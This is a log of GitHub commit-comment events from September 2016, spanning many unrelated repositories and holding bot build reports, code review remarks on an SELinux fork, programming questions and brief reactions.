{"id":"4606064834","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19139681,"position":null,"line":null,"path":null,"commit_id":"26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee","created_at":"2016-09-23T01:24:21Z","updated_at":"2016-09-23T01:24:21Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-23T01:24:21Z"}
{"id":"4606065157","type":"CommitCommentEvent","actor":{"login":"cuibg"},"repo":{"name":"cuibg/GitStudy"},"payload":{"comment":{"id":19139682,"position":null,"line":null,"path":null,"commit_id":"be0d1e6dc2fa0af6a179adc3eb7d1b19a2c60fe3","created_at":"2016-09-23T01:24:29Z","updated_at":"2016-09-23T01:24:29Z","body":"不错"}},"created_at":"2016-09-23T01:24:29Z"}
{"id":"4606066923","type":"CommitCommentEvent","actor":{"login":"Chronial"},"repo":{"name":"djangsters/django-libsass"},"payload":{"comment":{"id":19139690,"position":null,"line":null,"path":null,"commit_id":"da7dd42d91d721ee72a1cff917f34b1bdbe210f5","created_at":"2016-09-23T01:25:09Z","updated_at":"2016-09-23T01:25:09Z","body":"Why is this not a PR to the original project?"}},"created_at":"2016-09-23T01:25:09Z"}
{"id":"4606070306","type":"CommitCommentEvent","actor":{"login":"theoryshaw"},"repo":{"name":"uncreatednet/casa-brasileira"},"payload":{"comment":{"id":19139700,"position":null,"line":null,"path":null,"commit_id":"401b69db855d967c567ba452088a222f84f37624","created_at":"2016-09-23T01:26:23Z","updated_at":"2016-09-23T01:26:23Z","body":"👍 "}},"created_at":"2016-09-23T01:26:23Z"}
{"id":"4606076589","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19139713,"position":null,"line":null,"path":null,"commit_id":"9547962aa4aa2d366bed658449841b8639528376","created_at":"2016-09-23T01:28:49Z","updated_at":"2016-09-23T01:28:49Z","body":"So, you deleted the CSE stuff?"}},"created_at":"2016-09-23T01:28:49Z"}
{"id":"4606076841","type":"CommitCommentEvent","actor":{"login":"zhangxing0716"},"repo":{"name":"zhangxing0716/mmm"},"payload":{"comment":{"id":19139715,"position":null,"line":null,"path":null,"commit_id":"9fdc21955413a5e452f176974926eef3185a207e","created_at":"2016-09-23T01:28:56Z","updated_at":"2016-09-23T01:28:56Z","body":"好好学习,天天向上！"}},"created_at":"2016-09-23T01:28:56Z"}
{"id":"4606077890","type":"CommitCommentEvent","actor":{"login":"deadlyraptor"},"repo":{"name":"deadlyraptor/box-office-tracker"},"payload":{"comment":{"id":19139716,"position":26,"line":35,"path":"app.py","commit_id":"c493156c445a37ad07c2bb9d2feb425f3ba66591","created_at":"2016-09-23T01:29:21Z","updated_at":"2016-09-23T01:29:21Z","body":"I feel kind of shitty because I found that query via Google. I just don't know enough of the commands to use them on my own.\r\n\r\nHowever, this specific one made me realize I needed to add a autoincrementing id to the films otherwise I couldn't really differentiate between the most recent entry and the last. If you look at the schema, both tables have an INTEGER PRIMARY KEY. I hope that's okay. They don't reference each other (any references would be in the distributor column).\r\n\r\nAnyway, this code is meant to display the contents of the most recent addition back to the user after he or she submits the information. The app takes them to confirmation.html, spits out, \"The distributor/film was added successfully\" and then displays a table with the entry's data. Currently, the confirmation page is hardcoded to return only a film. Perhaps that should be abstracted to db.py? I was thinking of using an if statement that would print the distributor or the film depending on what method took them there (addDis or addFilm)."}},"created_at":"2016-09-23T01:29:21Z"}
{"id":"4606079086","type":"CommitCommentEvent","actor":{"login":"cxhernandez"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19139717,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-23T01:29:50Z","updated_at":"2016-09-23T01:29:50Z","body":"Thanks! Looking into this now\r\n\r\n> Should I open up an issue?\r\n\r\nThat would be great\r\n"}},"created_at":"2016-09-23T01:29:50Z"}
{"id":"4606084209","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19139730,"position":null,"line":null,"path":null,"commit_id":"8f7a2cb470e0e6cc10f93b8f404338fb6c26d4a4","created_at":"2016-09-23T01:31:45Z","updated_at":"2016-09-23T01:31:45Z","body":":+1: "}},"created_at":"2016-09-23T01:31:45Z"}
{"id":"4606086541","type":"CommitCommentEvent","actor":{"login":"yorikvanhavre"},"repo":{"name":"uncreatednet/casa-brasileira"},"payload":{"comment":{"id":19139734,"position":null,"line":null,"path":null,"commit_id":"401b69db855d967c567ba452088a222f84f37624","created_at":"2016-09-23T01:32:36Z","updated_at":"2016-09-23T01:32:36Z","body":"Taking shape! I think the structural question is close to be solved... Had devised a kind of \"structured\" roof like this:\r\n\r\n![screenshot](https://cloud.githubusercontent.com/assets/1136856/18771306/40fe6984-8114-11e6-861a-b07f1cbec3ff.jpg)\r\n\r\nBut I think it won't be necessary, the cantilevers are not so big anymore... Which is good because these things create annoying snow/dirt accumulation\r\n\r\nWorking on some interiors next."}},"created_at":"2016-09-23T01:32:36Z"}
{"id":"4606093984","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19139748,"position":91,"line":91,"path":"libselinux/Android.bp","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T01:35:28Z","updated_at":"2016-09-23T01:35:28Z","body":"libcrypto might not be needed anymore..."}},"created_at":"2016-09-23T01:35:28Z"}
{"id":"4606096706","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19139752,"position":16,"line":32,"path":"libselinux/src/label.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T01:36:31Z","updated_at":"2016-09-23T01:36:31Z","body":"I think I will drop this unless anyone likes it."}},"created_at":"2016-09-23T01:36:31Z"}
{"id":"4606098365","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19139755,"position":25,"line":41,"path":"libselinux/src/label.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T01:37:11Z","updated_at":"2016-09-23T01:37:11Z","body":"can we do MEDIA_BACKEND_CONFIG(&selabel_media_init); and hide the ifdef'ing in the macros, so this is cleaner"}},"created_at":"2016-09-23T01:37:11Z"}
{"id":"4606099223","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19139758,"position":55,"line":253,"path":"libselinux/src/label.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T01:37:28Z","updated_at":"2016-09-23T01:37:28Z","body":"superfolous change, kill"}},"created_at":"2016-09-23T01:37:28Z"}
{"id":"4606101979","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19139760,"position":16,"line":51,"path":"libselinux/src/load_policy.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T01:38:31Z","updated_at":"2016-09-23T01:38:31Z","body":"get rid of this newline?"}},"created_at":"2016-09-23T01:38:31Z"}
{"id":"4606103700","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19139767,"position":14,"line":29,"path":"libselinux/src/procattr.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T01:39:13Z","updated_at":"2016-09-23T01:39:13Z","body":"Does anyone know what the purpose was of having our own gettid?"}},"created_at":"2016-09-23T01:39:13Z"}
{"id":"4606106040","type":"CommitCommentEvent","actor":{"login":"Flamboyance10"},"repo":{"name":"Flamboyance10/learngit"},"payload":{"comment":{"id":19139781,"position":null,"line":null,"path":null,"commit_id":"2292a84c02b352ac41f478b134917d8d84ec8aa9","created_at":"2016-09-23T01:40:08Z","updated_at":"2016-09-23T01:40:08Z","body":"hello world"}},"created_at":"2016-09-23T01:40:08Z"}
{"id":"4606106902","type":"CommitCommentEvent","actor":{"login":"palmahutabarat"},"repo":{"name":"APKPure/languages-apkpure-com"},"payload":{"comment":{"id":19139785,"position":126,"line":378,"path":"languages/id/app.po","commit_id":"83c0974f9af5da90f3845ff4beb5c1f00ba05931","created_at":"2016-09-23T01:40:28Z","updated_at":"2016-09-23T01:40:28Z","body":"Selengkapnya..."}},"created_at":"2016-09-23T01:40:28Z"}
{"id":"4606109046","type":"CommitCommentEvent","actor":{"login":"palmahutabarat"},"repo":{"name":"APKPure/languages-apkpure-com"},"payload":{"comment":{"id":19139793,"position":48,"line":321,"path":"languages/id/app.po","commit_id":"83c0974f9af5da90f3845ff4beb5c1f00ba05931","created_at":"2016-09-23T01:41:20Z","updated_at":"2016-09-23T01:41:20Z","body":"Tanda Pengenal"}},"created_at":"2016-09-23T01:41:20Z"}
{"id":"4606110250","type":"CommitCommentEvent","actor":{"login":"Fuxiaolong"},"repo":{"name":"Fuxiaolong/test"},"payload":{"comment":{"id":19139795,"position":null,"line":null,"path":null,"commit_id":"dd9e78660bbef543c72f8aee3e609b6428971c67","created_at":"2016-09-23T01:41:47Z","updated_at":"2016-09-23T01:41:47Z","body":"beijing 9 due 23 has"}},"created_at":"2016-09-23T01:41:47Z"}
{"id":"4606110904","type":"CommitCommentEvent","actor":{"login":"codebymark"},"repo":{"name":"codebymark/easy-peasy-bot"},"payload":{"comment":{"id":19139796,"position":null,"line":null,"path":null,"commit_id":"3b15ab3a109ac49d3888fdd0b36f298f8ecf52b7","created_at":"2016-09-23T01:42:02Z","updated_at":"2016-09-23T01:42:02Z","body":"@margesimpson did you see this?"}},"created_at":"2016-09-23T01:42:02Z"}
{"id":"4606114222","type":"CommitCommentEvent","actor":{"login":"1KX2"},"repo":{"name":"TurboROM/frameworks_base"},"payload":{"comment":{"id":19139801,"position":null,"line":null,"path":null,"commit_id":"a9f43652059999e7171cd085df762a36384b69c3","created_at":"2016-09-23T01:43:17Z","updated_at":"2016-09-23T01:43:17Z","body":"Might want to stop picking from benzo. He picks commits and amends authorship to himself. This is probably a kang. Probably broken too, since he picks open commits from gerrit."}},"created_at":"2016-09-23T01:43:17Z"}
{"id":"4606117981","type":"CommitCommentEvent","actor":{"login":"codebymark"},"repo":{"name":"codebymark/easy-peasy-bot"},"payload":{"comment":{"id":19139810,"position":null,"line":null,"path":null,"commit_id":"3b15ab3a109ac49d3888fdd0b36f298f8ecf52b7","created_at":"2016-09-23T01:44:44Z","updated_at":"2016-09-23T01:44:44Z","body":"<!channel> check this please"}},"created_at":"2016-09-23T01:44:44Z"}
{"id":"4606119474","type":"CommitCommentEvent","actor":{"login":"ahoneybun"},"repo":{"name":"system76/docs"},"payload":{"comment":{"id":19139814,"position":null,"line":null,"path":null,"commit_id":"d0121db5ed8c6b9a1d639bc1e8f83ebc7c36ba45","created_at":"2016-09-23T01:45:17Z","updated_at":"2016-09-23T01:45:17Z","body":"want some from KDE?"}},"created_at":"2016-09-23T01:45:17Z"}
{"id":"4606120027","type":"CommitCommentEvent","actor":{"login":"PatMattei"},"repo":{"name":"UnrealCourse/02_BullCowGame"},"payload":{"comment":{"id":19139816,"position":null,"line":null,"path":null,"commit_id":"0bf9c9bbcba2f7a60c83d92bda710f26931f6502","created_at":"2016-09-23T01:45:30Z","updated_at":"2016-09-23T01:45:30Z","body":"I just copied the entire code into XCode and I'm getting the error: \"Control may reach end of non-void function\""}},"created_at":"2016-09-23T01:45:30Z"}
{"id":"4606121150","type":"CommitCommentEvent","actor":{"login":"jjhok"},"repo":{"name":"albatStudio/happyBaby"},"payload":{"comment":{"id":19139818,"position":113,"line":113,"path":"app/src/main/java/com/superkorsuk/happybaby/db/BabyRepository.java","commit_id":"d64dc67adcef2a74d8e64afdb8e3bf437159e922","created_at":"2016-09-23T01:45:56Z","updated_at":"2016-09-23T01:45:56Z","body":" gestation_period 가 뭐야? "}},"created_at":"2016-09-23T01:45:56Z"}
{"id":"4606123536","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"ember-learn/ember-help-wanted-backend"},"payload":{"comment":{"id":19139827,"position":null,"line":null,"path":null,"commit_id":"1b71cfd2a0a8b3715fcb09de77abfbfa864370fb","created_at":"2016-09-23T01:46:44Z","updated_at":"2016-09-23T01:46:44Z","body":"beautiful! I can use some of this to improve the docs.."}},"created_at":"2016-09-23T01:46:44Z"}
{"id":"4606123709","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphController"},"payload":{"comment":{"id":19139828,"position":null,"line":null,"path":null,"commit_id":"ba4cccfe0c4a46764323bee889a8f970885ab184","created_at":"2016-09-23T01:46:47Z","updated_at":"2016-09-23T01:46:47Z","body":"did you see the video??? https://youtu.be/JrnNnhD1gWg\n\n2016-09-23 5:00 GMT+08:00 No1KnowMe <notifications@github.com>:\n\n> Man , thanks for this Tweak , but i don't know how to use it , i download\n> and compile XGlyphiOS e XglyphController , but how can i use it ? Little\n> Wiki please 😅😊😉\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/xfunforx/XglyphController/commit/ba4cccfe0c4a46764323bee889a8f970885ab184#commitcomment-19136845>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANVDrK3n4LbsRL4JMFMb-AjrLnc_y43eks5qsuxigaJpZM4KEWy9>\n> .\n>\n"}},"created_at":"2016-09-23T01:46:47Z"}
{"id":"4606124667","type":"CommitCommentEvent","actor":{"login":"Fuxiaolong"},"repo":{"name":"Fuxiaolong/test"},"payload":{"comment":{"id":19139830,"position":null,"line":null,"path":null,"commit_id":"dd9e78660bbef543c72f8aee3e609b6428971c67","created_at":"2016-09-23T01:47:13Z","updated_at":"2016-09-23T01:47:13Z","body":"beijing in 9yue 23 has"}},"created_at":"2016-09-23T01:47:13Z"}
{"id":"4606125934","type":"CommitCommentEvent","actor":{"login":"whitewhim2718"},"repo":{"name":"QInfer/python-qinfer"},"payload":{"comment":{"id":19139833,"position":null,"line":null,"path":null,"commit_id":"2afc8d4246f77a0e2b74c5274201196f3e156560","created_at":"2016-09-23T01:47:43Z","updated_at":"2016-09-23T01:47:43Z","body":"Looks good. "}},"created_at":"2016-09-23T01:47:43Z"}
{"id":"4606126493","type":"CommitCommentEvent","actor":{"login":"codebymark"},"repo":{"name":"codebymark/easy-peasy-bot"},"payload":{"comment":{"id":19139835,"position":null,"line":null,"path":null,"commit_id":"3b15ab3a109ac49d3888fdd0b36f298f8ecf52b7","created_at":"2016-09-23T01:47:55Z","updated_at":"2016-09-23T01:47:55Z","body":"<!margesimpson> check this"}},"created_at":"2016-09-23T01:47:55Z"}
{"id":"4606126513","type":"CommitCommentEvent","actor":{"login":"Fuxiaolong"},"repo":{"name":"Fuxiaolong/test"},"payload":{"comment":{"id":19139836,"position":5,"line":14,"path":".gitignore","commit_id":"dd9e78660bbef543c72f8aee3e609b6428971c67","created_at":"2016-09-23T01:47:56Z","updated_at":"2016-09-23T01:47:56Z","body":"haha"}},"created_at":"2016-09-23T01:47:56Z"}
{"id":"4606127097","type":"CommitCommentEvent","actor":{"login":"Fuxiaolong"},"repo":{"name":"Fuxiaolong/test"},"payload":{"comment":{"id":19139839,"position":4,"line":13,"path":".gitignore","commit_id":"dd9e78660bbef543c72f8aee3e609b6428971c67","created_at":"2016-09-23T01:48:08Z","updated_at":"2016-09-23T01:48:08Z","body":"fuck "}},"created_at":"2016-09-23T01:48:08Z"}
{"id":"4606127970","type":"CommitCommentEvent","actor":{"login":"sizheng0320"},"repo":{"name":"igraph/python-igraph"},"payload":{"comment":{"id":19139840,"position":null,"line":null,"path":null,"commit_id":"abb4a67b24b9ee8efcfb1629cc6c58358cc306c2","created_at":"2016-09-23T01:48:27Z","updated_at":"2016-09-23T01:48:27Z","body":"well, this fix helps, but not completely.\r\n\r\nwhen I run the code in Jupyter(Ipython) notebook, it made the notebook something wrong:\r\n\r\n`/usr/local/lib/python3.5/site-packages/IPython/core/formatters.py:367: FormatterWarning: image/svg+xml formatter returned invalid type <class 'bytes'> (expected (<class 'str'>,)) for object: <igraph.drawing.Plot object at 0x7f5bc4a60630>\r\n  FormatterWarning`\r\n\r\nand it can't plot.\r\n\r\nso I change \"return result\" into \"return str(result)\", then it works in the notebook.\r\n\r\nbut I have not tested how it works without the notebook."}},"created_at":"2016-09-23T01:48:27Z"}
{"id":"4606129662","type":"CommitCommentEvent","actor":{"login":"bkempe"},"repo":{"name":"Recombine/Hibernate-PostgreSQL-Extended-Dialect"},"payload":{"comment":{"id":19139848,"position":null,"line":null,"path":null,"commit_id":"75b5598da5d2dea4d98a6f02e738e8ba08b33da3","created_at":"2016-09-23T01:49:05Z","updated_at":"2016-09-23T01:49:05Z","body":"@vkuzel Thanks for the heads up! It's amazing that you took the time to notify your users :)"}},"created_at":"2016-09-23T01:49:05Z"}
{"id":"4606129668","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphController"},"payload":{"comment":{"id":19139847,"position":null,"line":null,"path":null,"commit_id":"ba4cccfe0c4a46764323bee889a8f970885ab184","created_at":"2016-09-23T01:49:05Z","updated_at":"2016-09-23T01:49:05Z","body":"compile the XglyphController and XGlyphiOS , open the XglyphController and\ntap the start .\n\nnow ,can you see the red button on the screen???\n\nyes tap it. and begin. tap the blue button for capture the image of screen.\n\n2016-09-23 9:46 GMT+08:00 X Fun <xfunforx@gmail.com>:\n\n> did you see the video??? https://youtu.be/JrnNnhD1gWg\n>\n> 2016-09-23 5:00 GMT+08:00 No1KnowMe <notifications@github.com>:\n>\n>> Man , thanks for this Tweak , but i don't know how to use it , i download\n>> and compile XGlyphiOS e XglyphController , but how can i use it ? Little\n>> Wiki please 😅😊😉\n>>\n>> —\n>> You are receiving this because you are subscribed to this thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/xfunforx/XglyphController/commit/ba4cccfe0c4a46764323bee889a8f970885ab184#commitcomment-19136845>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ANVDrK3n4LbsRL4JMFMb-AjrLnc_y43eks5qsuxigaJpZM4KEWy9>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-23T01:49:05Z"}
{"id":"4606131020","type":"CommitCommentEvent","actor":{"login":"mmalohlava"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":19139851,"position":6,"line":10,"path":"r/rsparkling/DESCRIPTION","commit_id":"3a297680262f9748375be28d95251d0917632223","created_at":"2016-09-23T01:49:36Z","updated_at":"2016-09-23T01:49:36Z","body":"Erin, should we generate here exact version check (e.g., `>=3.10.0.6`)"}},"created_at":"2016-09-23T01:49:36Z"}
{"id":"4606131669","type":"CommitCommentEvent","actor":{"login":"jrfernandes"},"repo":{"name":"abendig/django-meetup"},"payload":{"comment":{"id":19139854,"position":null,"line":null,"path":null,"commit_id":"107d1f94c229ae019607517bba1da51672299e5e","created_at":"2016-09-23T01:49:52Z","updated_at":"2016-09-23T01:49:52Z","body":"👍 "}},"created_at":"2016-09-23T01:49:52Z"}
{"id":"4606136957","type":"CommitCommentEvent","actor":{"login":"Chrisyjs"},"repo":{"name":"Chrisyjs/JaneShopping__jq"},"payload":{"comment":{"id":19139864,"position":null,"line":null,"path":null,"commit_id":"e2e8f7d2d5405fd0f8c6a745097b04ac8f3c52d0","created_at":"2016-09-23T01:51:50Z","updated_at":"2016-09-23T01:51:50Z","body":"a shopping website writed by jquery"}},"created_at":"2016-09-23T01:51:50Z"}
{"id":"4606137969","type":"CommitCommentEvent","actor":{"login":"glennw"},"repo":{"name":"glennw/servo"},"payload":{"comment":{"id":19139867,"position":3,"line":3,"path":"tests/wpt/metadata-css/css-transforms-1_dev/html/scale-zero-001.htm.ini","commit_id":"4c6aad5fae4c598d23b2fb0a40eab0e766c44aec","created_at":"2016-09-23T01:52:10Z","updated_at":"2016-09-23T01:52:10Z","body":"This test produces a non-invertible matrix that WR panics on - https://github.com/servo/webrender/issues/418.\r\n"}},"created_at":"2016-09-23T01:52:10Z"}
{"id":"4606137977","type":"CommitCommentEvent","actor":{"login":"nazari11"},"repo":{"name":"xwiki-contrib/gedit-velocity-highlighting"},"payload":{"comment":{"id":19139868,"position":12,"line":11,"path":"README.md","commit_id":"6fdb3591b5dea2601b21223385add02bc05376c3","created_at":"2016-09-23T01:52:10Z","updated_at":"2016-09-23T01:52:10Z","body":"H"}},"created_at":"2016-09-23T01:52:10Z"}
{"id":"4606138423","type":"CommitCommentEvent","actor":{"login":"glennw"},"repo":{"name":"glennw/servo"},"payload":{"comment":{"id":19139870,"position":3,"line":3,"path":"tests/wpt/metadata-css/css-transforms-1_dev/html/transform3d-scale-004.htm.ini","commit_id":"4c6aad5fae4c598d23b2fb0a40eab0e766c44aec","created_at":"2016-09-23T01:52:18Z","updated_at":"2016-09-23T01:52:18Z","body":"This test produces a non-invertible matrix that WR panics on - https://github.com/servo/webrender/issues/418.\r\n"}},"created_at":"2016-09-23T01:52:18Z"}
{"id":"4606142871","type":"CommitCommentEvent","actor":{"login":"roryaronson"},"repo":{"name":"FarmBot-Labs/laughing-octo-telegram"},"payload":{"comment":{"id":19139880,"position":null,"line":null,"path":null,"commit_id":"bb810fe52fc0cdd1c1b78e128dc0f5c62d03b164","created_at":"2016-09-23T01:53:55Z","updated_at":"2016-09-23T01:53:55Z","body":"God damn that commit title!"}},"created_at":"2016-09-23T01:53:55Z"}
{"id":"4606143736","type":"CommitCommentEvent","actor":{"login":"musicus"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":19139881,"position":null,"line":null,"path":null,"commit_id":"2a49417c2f8f62b4dd3a1523a20ce1a15fba73d0","created_at":"2016-09-23T01:54:13Z","updated_at":"2016-09-23T01:54:13Z","body":"@alexandermorgan ... did you fix it?"}},"created_at":"2016-09-23T01:54:13Z"}
{"id":"4606144523","type":"CommitCommentEvent","actor":{"login":"lagelalegal"},"repo":{"name":"sebdah/git-pylint-commit-hook"},"payload":{"comment":{"id":19139884,"position":null,"line":null,"path":null,"commit_id":"d82fb72191ecf06e3189c4ce5083d18a7771abad","created_at":"2016-09-23T01:54:30Z","updated_at":"2016-09-23T01:54:30Z","body":"@sandipagarwal  The error info is:\r\n`If no other git process is currently running, this probably means a\r\ngit process crashed in this repository earlier. Make sure no other git\r\nprocess is running and remove the file manually to continue.`\r\n\r\nThat's mean the git process crashed, If the index.lock file exists, we files added be lost and this files at git process stash when we use this hook."}},"created_at":"2016-09-23T01:54:30Z"}
{"id":"4606144847","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19139886,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-23T01:54:38Z","updated_at":"2016-09-23T01:54:38Z","body":"Got it. In looking at other people's code, I'm seeing a lot of iterators\nfor traversing various data structures. Is that something (like\nconstructors) that people picked up from Java, and is it idiomatic Go to\nwrite iterator functions (as opposed to, say, just iterating within a\nfunction if iteration is not something you re-use over and over in that\npackage)?\n\nThanks!\n\nOn Thu, Sep 22, 2016 at 12:43 PM, Joe Tsai <notifications@github.com> wrote:\n\n> The new built-in function only accepts a type as the input. Thus,\n> new(Node) works since Node is a type. And new(Node{Value: v}) doesn't\n> work because Node{Value: v} is a type literal (i.e., it is concrete\n> value).\n>\n> Similar the first argument of make also only accepts a type.\n>\n> For these reasons, new and make are magical in that they are impossible\n> implement by you. They rely on features beyond what you can write with\n> normal functions.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epkann/Data-Structures/commit/2298f8a0d3b806966a36670d789ccc5a2b761d4f#commitcomment-19134162>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASib13FJip1phMtxn2TXsmXxQ1OVXnLBks5qsr5MgaJpZM4KCOtE>\n> .\n>\n\n\n\n-- \nwww.esthertsai.com\n"}},"created_at":"2016-09-23T01:54:38Z"}
{"id":"4606151619","type":"CommitCommentEvent","actor":{"login":"MatthewVance"},"repo":{"name":"MatthewVance/nginx-build"},"payload":{"comment":{"id":19139898,"position":null,"line":null,"path":null,"commit_id":"368db4eee29407f2ee22f98de39d739dcdf7973e","created_at":"2016-09-23T01:57:05Z","updated_at":"2016-09-23T01:57:05Z","body":"I understand. I've just saw something the other day which I needed to fix in my config. By the way, the map module is back in now. See 6adc6b399f97b76d977fca5b048bc36e903b24a1. I'm glad you find the script useful!"}},"created_at":"2016-09-23T01:57:05Z"}
{"id":"4606157263","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19139903,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-23T01:59:05Z","updated_at":"2016-09-23T01:59:05Z","body":"Also - what is the difference between iterating and recursion (for\ntraversing a DS)?\n\nOn Thu, Sep 22, 2016 at 8:54 PM, Esther Tsai <epkann@gmail.com> wrote:\n\n> Got it. In looking at other people's code, I'm seeing a lot of iterators\n> for traversing various data structures. Is that something (like\n> constructors) that people picked up from Java, and is it idiomatic Go to\n> write iterator functions (as opposed to, say, just iterating within a\n> function if iteration is not something you re-use over and over in that\n> package)?\n>\n> Thanks!\n>\n> On Thu, Sep 22, 2016 at 12:43 PM, Joe Tsai <notifications@github.com>\n> wrote:\n>\n>> The new built-in function only accepts a type as the input. Thus,\n>> new(Node) works since Node is a type. And new(Node{Value: v}) doesn't\n>> work because Node{Value: v} is a type literal (i.e., it is concrete\n>> value).\n>>\n>> Similar the first argument of make also only accepts a type.\n>>\n>> For these reasons, new and make are magical in that they are impossible\n>> implement by you. They rely on features beyond what you can write with\n>> normal functions.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/epkann/Data-Structures/commit/2298f8a0d3b806966a36670d789ccc5a2b761d4f#commitcomment-19134162>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ASib13FJip1phMtxn2TXsmXxQ1OVXnLBks5qsr5MgaJpZM4KCOtE>\n>> .\n>>\n>\n>\n>\n> --\n> www.esthertsai.com\n>\n\n\n\n-- \nwww.esthertsai.com\n"}},"created_at":"2016-09-23T01:59:05Z"}
{"id":"4607654121","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19143897,"position":null,"line":null,"path":null,"commit_id":"591ebb22c0b54f92cf3798a32d53d657345d68e6","created_at":"2016-09-23T10:00:10Z","updated_at":"2016-09-23T10:00:10Z","body":"yes, proceed as you wish !"}},"created_at":"2016-09-23T10:00:10Z"}
{"id":"4607654184","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19143898,"position":51,"line":51,"path":"src/main/java/medic/gateway/alert/GatewayEventLogFragment.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-23T10:00:10Z","updated_at":"2016-09-23T10:00:10Z","body":"dammit! :D And I guess using fully qualified names kinda defeats the purpose.\r\nLogLoader?"}},"created_at":"2016-09-23T10:00:10Z"}
{"id":"4607655355","type":"CommitCommentEvent","actor":{"login":"mygaujg"},"repo":{"name":"TakeScoop/SwiftyRSA"},"payload":{"comment":{"id":19143900,"position":345,"line":410,"path":"SwiftyRSA/SwiftyRSA.swift","commit_id":"05dc93d16b0ea8da84125c5d4a2fa2e77403d58f","created_at":"2016-09-23T10:00:21Z","updated_at":"2016-09-23T10:00:21Z","body":"fwe"}},"created_at":"2016-09-23T10:00:21Z"}
{"id":"4607655872","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143901,"position":null,"line":null,"path":null,"commit_id":"acb20235a0a2fe6c31945ab7aa896aeed0ab2873","created_at":"2016-09-23T10:00:27Z","updated_at":"2016-09-23T10:00:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1140](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14090&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 251, ignored: 3 Build time: 00:11:01"}},"created_at":"2016-09-23T10:00:27Z"}
